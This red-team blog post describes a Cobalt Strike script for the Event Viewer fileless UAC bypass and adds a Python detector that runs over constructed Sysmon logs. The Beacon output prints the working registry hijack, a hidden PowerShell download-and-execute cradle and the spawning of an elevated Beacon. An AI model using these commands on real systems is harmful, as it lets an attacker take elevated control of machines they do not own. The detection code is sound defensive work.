
Eventvwr File-less UAC Bypass CNA

December 6, 2016 • Security

[Image: UAC prompt on Windows 10]

Background

Matt Nelson recently published a very interesting fileless UAC bypass that abuses Event Viewer (eventvwr.exe), together with a Metasploit module for it. Following that, we decided to implement the technique as a CNA (Aggressor) script for Cobalt Strike. Cobalt Strike's built-in UAC bypass relies on DLL hijacking and has to write the hijack DLL to disk, as shown below:

beacon> bypassuac
[*] Tasked beacon to spawn windows/beacon_smb/bind_pipe (127.0.0.1:6667) in a high integrity process
[+] host called home, sent: 111759 bytes
[+] received output:
[*] Wrote hijack DLL to 'C:\Users\vysec\AppData\Local\Temp\0a80.dll'
[+] Privileged file copy success! C:\WINDOWS\System32\NTWDBLIB.dll
[+] C:\WINDOWS\System32\cliconfg.exe ran and exited.
[*] Cleanup successful

Overview

Bypassuac-eventvwr is an easy-to-use implementation of the eventvwr UAC bypass. Unlike the DLL-hijack bypass above, nothing is written to disk, so file-based antivirus scanning has nothing to flag. It is not invisible, though: the write to HKCU\Software\Classes\mscfile\shell\open\command and the resulting process tree (eventvwr.exe launching cmd.exe / powershell.exe) are both observable to endpoint telemetry.

The CNA script performs the following steps:

  • Writes the registry hijack (HKCU\Software\Classes\mscfile\shell\open\command)
  • Executes eventvwr.exe
  • eventvwr.exe, which auto-elevates, runs the hijacked command
  • Spawns a new Beacon over SMB (windows/beacon_smb/bind_pipe)
  • Deletes the registry hijack
  • Links to the resulting high-integrity Beacon

Usage example

beacon> bypassuac-eventvwr "smb"
[*] Tasked Beacon to BypassUAC to windows/beacon_smb/bind_pipe (127.0.0.1:6667) via Eventvwr Fileless UAC Bypass
[*] Adding Registry Key
[*] reg add "HKCU\Software\Classes\mscfile\shell\open\command" /f /d "cmd.exe /c powershell -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://127.0.0.1:8390/'))
[*] Tasked beacon to run: reg add "HKCU\Software\Classes\mscfile\shell\open\command" /f /d "cmd.exe /c powershell -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://127.0.0.1:8390/'))
[*] Spawning Eventvwr.exe
[*] Tasked beacon to run: eventvwr.exe
[+] host called home, sent: 3253 bytes
[*] Deleting Registry Key
[*] reg delete "HKCU\Software\Classes\mscfile\shell\open\command" /f
[*] Tasked beacon to run: reg delete "HKCU\Software\Classes\mscfile\shell\open\command" /f
[+] received output:
The operation completed successfully.
[+] host called home, sent: 196761 bytes
[+] established link to child beacon: 192.168.114.134
[+] received output:
The operation completed successfully.
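The step list above and the Beacon output show the two host artifacts this bypass leaves even though it never touches disk: the HKCU mscfile handler write/delete and eventvwr.exe spawning a shell. As an added example (not part of the original post or of the MDSec CNA script), the Python below runs that detection logic over constructed Sysmon-style events. The log lines, the SID, the beacon.exe path and the key=value line format are made up for illustration; Sysmon records HKCU keys under HKU\<SID>\..., which is why the match is on the tail of the key path.

```python
from __future__ import annotations

import re
from pathlib import PureWindowsPath

# Tail of the registry path the CNA script hijacks (taken from the reg add
# output above). Sysmon logs HKCU keys as HKU\<SID>\..., so match the tail.
HIJACK_KEY_TAIL = r"\software\classes\mscfile\shell\open\command"

# Children that an auto-elevated eventvwr.exe has no business launching.
# mmc.exe is its legitimate child and is deliberately not listed.
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "wscript.exe",
                       "cscript.exe", "mshta.exe", "rundll32.exe"}

# Constructed Sysmon-style events (one key=value record per line). These are
# NOT real telemetry; the SID, user path and beacon.exe name are invented.
SAMPLE_LOG = r"""
EventID=1 Image=C:\Windows\System32\reg.exe ParentImage=C:\Users\vysec\beacon.exe CommandLine=reg add "HKCU\Software\Classes\mscfile\shell\open\command" /f /d "cmd.exe /c powershell -nop -w hidden"
EventID=13 TargetObject=HKU\S-1-5-21-1-2-3-1001\Software\Classes\mscfile\shell\open\command\(Default) Details=cmd.exe /c powershell -nop -w hidden
EventID=1 Image=C:\Windows\System32\eventvwr.exe ParentImage=C:\Users\vysec\beacon.exe CommandLine=eventvwr.exe
EventID=1 Image=C:\Windows\System32\cmd.exe ParentImage=C:\Windows\System32\eventvwr.exe CommandLine=cmd.exe /c powershell -nop -w hidden
EventID=1 Image=C:\Windows\System32\mmc.exe ParentImage=C:\Windows\System32\eventvwr.exe CommandLine="C:\Windows\system32\mmc.exe" eventvwr.msc
EventID=12 EventType=DeleteKey TargetObject=HKU\S-1-5-21-1-2-3-1001\Software\Classes\mscfile\shell\open\command
EventID=1 Image=C:\Windows\System32\notepad.exe ParentImage=C:\Windows\explorer.exe CommandLine=notepad.exe
"""


def parse_line(line: str) -> dict[str, str]:
    """Split 'Key=Value Key=Value ...' where values may contain spaces but keys are bare words."""
    parts = re.split(r"\s+(?=[A-Za-z]+=)", line.strip())
    return dict(p.split("=", 1) for p in parts)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (quotes tolerated)."""
    return PureWindowsPath(path.strip('"')).name.lower()


def detect(log_text: str) -> list[tuple[int, str]]:
    """Return (line_no, reason) for every event that matches the hijack pattern."""
    alerts: list[tuple[int, str]] = []
    for n, line in enumerate(log_text.strip().splitlines(), 1):
        ev = parse_line(line)
        eid = int(ev["EventID"])
        if eid in (12, 13) and HIJACK_KEY_TAIL in ev.get("TargetObject", "").lower():
            # Event 13 = value set (the hijack), Event 12 DeleteKey = the cleanup step
            action = "deleted" if ev.get("EventType") == "DeleteKey" else "set"
            alerts.append((n, f"mscfile handler {action} under HKCU"))
        elif eid == 1:
            image = basename(ev.get("Image", ""))
            parent = basename(ev.get("ParentImage", ""))
            if parent == "eventvwr.exe" and image in SUSPICIOUS_CHILDREN:
                alerts.append((n, f"eventvwr.exe spawned {image}"))
            elif image == "reg.exe" and HIJACK_KEY_TAIL in ev.get("CommandLine", "").lower():
                # Catches the reg.exe write even on hosts without registry auditing
                alerts.append((n, "reg.exe touching the mscfile handler key"))
    return alerts


def hijack_chain(alerts: list[tuple[int, str]]) -> bool:
    """High-confidence signal: the handler was set *before* eventvwr.exe spawned a shell."""
    set_lines = [n for n, reason in alerts if "handler set" in reason]
    spawn_lines = [n for n, reason in alerts if "spawned" in reason]
    return any(s < p for s in set_lines for p in spawn_lines)


if __name__ == "__main__":
    found = detect(SAMPLE_LOG)
    for line_no, reason in found:
        print(f"line {line_no}: {reason}")
    print("full hijack chain observed:", hijack_chain(found))
```

The mmc.exe child is left alone on purpose: Event Viewer legitimately launches mmc.exe with eventvwr.msc, so alerting on every eventvwr.exe child would be noisy. Correlating the handler write with the shell spawn (`hijack_chain`) is what separates this bypass from an unrelated registry change.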

Bypassuac-eventvwr

https://github.com/mdsecresearch/Publications/blob/master/tools/redteam/cna/eventvwr.cna
